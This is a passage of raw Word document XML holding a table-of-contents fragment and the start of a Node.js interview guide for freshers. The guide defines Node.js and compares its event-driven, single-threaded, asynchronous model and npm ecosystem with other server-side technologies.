        <w:p w14:paraId="0A70EA06" w14:textId="2167FA33" w:rsidR="00593FEF" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10314"/>
            </w:tabs>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc178383405" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>20. What are best practices for securing a Kubernetes cluster?</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178383405 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00A10E8A">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>175</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="447AE03E" w14:textId="28CEA28D" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00C4764B" w:rsidP="009E0607">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DA2F32">
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5EF13E0F" w14:textId="70EF6626" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="616161"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc178383183"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>interview questions for freshers and juniors:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="67E6BB4F"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1" w:name="_Toc178383184"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q1. What is Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="72CF547D" w14:textId="5F1145A4" w:rsidR="00CD2B1C" w:rsidRPr="00DA2F32" w:rsidRDefault="00CD2B1C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is a runtime environment that allows you to run JavaScript code outside of a web browser. It is built on Google's V8 JavaScript engine, which is the same engine that powers the Chrome browser, and it enables developers to use JavaScript for server-side scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACBB30"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2" w:name="_Toc178383185"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q2. How does Node.js differ from other server-side technologies?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="50EC026F" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Event-Driven, Non-Blocking I/O Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09263CB0" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2CFAE" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is built on an event-driven, non-blocking I/O model. It uses an event loop to handle multiple concurrent connections efficiently without creating a new thread for each request. This makes Node.js highly scalable, particularly for I/O-bound tasks like handling multiple network requests, reading/writing to databases, or file systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70161256" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA5C10" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Traditional server-side technologies like PHP, Java (Servlets), or Ruby on Rails use a multi-threaded or multi-process model. Each request may be handled by a separate thread or process, which can lead to higher memory usage and potential thread contention issues, especially under high load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A9E2B" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Single-Threaded vs. Multi-Threaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD28E9D" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB629AD" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js operates on a single thread with an event loop. It leverages asynchronous programming to manage multiple tasks concurrently on that single thread, which is ideal for I/O-bound applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969C05E" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905ACFE" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Most other server-side technologies are multi-threaded. For example, Java and .NET typically create a new thread for each request. This can be more efficient for CPU-bound tasks but can lead to scalability challenges when handling thousands of concurrent I/O-bound requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA53C1" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Unified Programming Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBF7E4" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61CB6D" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>With Node.js, you use JavaScript for both client-side and server-side code. This unification simplifies development, as developers can work across the entire stack using the same language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6207E" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD93A0C" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other server-side technologies often require different languages for the front-end and back-end. For example, in a typical LAMP (Linux, Apache, MySQL, PHP) stack, PHP is used on the server-side, while JavaScript is used on the client-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94A1A6" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Asynchronous Programming Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A1521" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD952D5" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js promotes an asynchronous, non-blocking programming model using callbacks, Promises, and async/await. This makes it well-suited for real-time applications, such as chat apps or collaborative tools, where multiple I/O operations need to be handled concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B5F90" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DFB45" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Many traditional server-side platforms are synchronous by default. For example, in PHP, I/O operations are blocking, meaning they wait for a task to complete before moving on to the next one. Although asynchronous patterns exist in languages like Python (with asyncio) or Java (with CompletableFuture), they are not as deeply integrated into the core model as they are in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD4562" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Community and Ecosystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B86BC" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CB4BD" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js has a vibrant ecosystem centered around npm (Node Package Manager), which is the largest package ecosystem in the world. Developers can easily find and use a vast range of libraries and tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E735A" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C227B" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other platforms also have extensive ecosystems (e.g., PyPI for Python, Maven for Java, RubyGems for Ruby), but they tend to be more fragmented across different languages and environments. Node.js’s unified ecosystem allows for faster development with consistent tools and libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136399E9" w14:textId="77777777" w:rsidR="00FA3578" w:rsidRPr="00DA2F32" w:rsidRDefault="00FA3578" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
